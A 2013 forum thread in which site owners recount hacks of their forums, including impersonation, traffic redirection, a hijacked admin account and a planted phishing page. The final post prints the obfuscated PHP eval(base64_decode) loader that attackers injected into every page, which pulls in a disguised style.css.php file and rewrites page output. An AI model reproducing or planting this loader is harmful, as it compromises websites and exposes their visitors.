1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Your 'hacking' experiences.

Discussion in 'Off Topic' started by Crayo, Mar 8, 2013.

  1. Crayo

    Crayo Active Member

    This thread is inspired by this one.

    How many of you have undergone experiences where some type of hacking has directly effected your site? It has to be one of the most worrying experience almost everyone eventually gets confronted with.

    If you have never been hacked, has anything ever effected your forums livelihood? Has you undergone an experience where at one point you thought your forum was gone forever?
  2. Slavik

    Slavik XenForo Moderator Staff Member

    Crayo likes this.
  3. ManagerJosh

    ManagerJosh Well-Known Member

    Haven't dealt with a security incident/data breach yet for myself, but I try to do a pen test on my site about once to twice a year to see if there are any holes we missed.
  4. Adam Howard

    Adam Howard Well-Known Member

    1) Troll hacker

    Hacker logged in as me, pretended to be me and disrespected everyone to the point where people were thinking of leaving, and than made an announcement that the site was closing & told people they'd be better off going to X site.

    The hacker then proceeded to continue to pretend to be me... Claiming the site was hacked, that it wasn't really me.... But he continued to trash talk everyone. Made announcement that the site had been sold and pretended to be someone else. Proceeded to retract that announcement and continued to "mind f*ck" people.

    So by the time I (me, the real me) came back ...... Nothing I could say had much credit.

    2) Script kiddie

    Someone accessed our file server and re-directed traffic. The flaw they found actually prompted vBulletin to release a security update.

    3) Web Host (current resolving issue)

    Crayo likes this.
  5. ManagerJosh

    ManagerJosh Well-Known Member

    SneakyDave and Adam Howard like this.
  6. Crayo

    Crayo Active Member

    Wow, that's actually inspiring. Thanks for sharing. I've not once seen any site-owners sue their hackers AND succeed.
  7. Slavik

    Slavik XenForo Moderator Staff Member

    The preparation and investagative work needed was pretty heavy...
  8. Deebs

    Deebs Well-Known Member

    I got caught hacking when I was 18 working as a data inputter for the largest mortgage company in the UK at the time (running on PCs and not mainframes). They offered me a job in "The Computer Room" :)
    Digital Doctor likes this.
  9. AdamD

    AdamD Well-Known Member

  10. AdamD

    AdamD Well-Known Member

    As for my own experience, not been hacked per se', but one of my admins accounts was taken over and it's only because I was online and noticed his IP was in a different part of the USA, did I block it and the account.

    Oddly enough, said Admin threw a tantrum when I asked him to check his PC for trojans etc, needless to say, he never came back as staff.
  11. Adam Howard

    Adam Howard Well-Known Member

  12. MattW

    MattW Well-Known Member

    Only time I've every suffered anything was back in 2009, when I was using OSCommerce for our online shop, and on phpBB3.

    messages screen.JPG

    It was asking members to re-enter their username and password via a separate page


    They got it via a zero day in OSCommerce, and used the phpBB3 portal page to store their files as it had a 777 directory in there

  13. Crayo

    Crayo Active Member

    Those images won't work for me :(.
  14. MattW

    MattW Well-Known Member

    I've been a retard! I linked them from a protected forum on my site :oops:
    Crayo likes this.
  15. Slavik

    Slavik XenForo Moderator Staff Member

    Looks.. legit... :cautious:
    MattW likes this.
  16. MattW

    MattW Well-Known Member

    Tell me about it. I was notified about it from one of my mods......

    This is what was added into each page
    <span class="syntaxhtml"><br /><span class="syntaxdefault"><?php </span><span class="syntaxcomment">/**/</span><span class="syntaxkeyword">eval(</span><span class="syntaxdefault">base64_decode</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT<br />0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS96MjJzZS9wdWJsaWNfaHRtbC9mb3J1bS9zdHlsZXMvcHJvc2lsdmVyL3RlbXBsYXRlL3BvcnRhbC9ibG9jay9kb25hdGlvbi9DVl<br />Mvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3oyMnNlL3B1YmxpY19odG1sL2ZvcnVtL3N0eWxlcy9wcm9zaWx2ZXIvdGVtcGxhdGUvcG9ydGFsL2Jsb2<br />NrL2RvbmF0aW9uL0NWUy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2<br />V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0<br />E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMD<br />skUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0<br />ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MU<br />IyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMj<br />A1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT<br />1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOT<br />hDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4Mk<br />YwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUj<br />YwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOU<br />M3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz<br />09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMT<br />BFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW<br />5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX2<br />1hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLC<br />ckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOT<br />A7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0='</span><span class="syntaxkeyword">)); </span><span class="syntaxdefault">?><br /></span></span>

Share This Page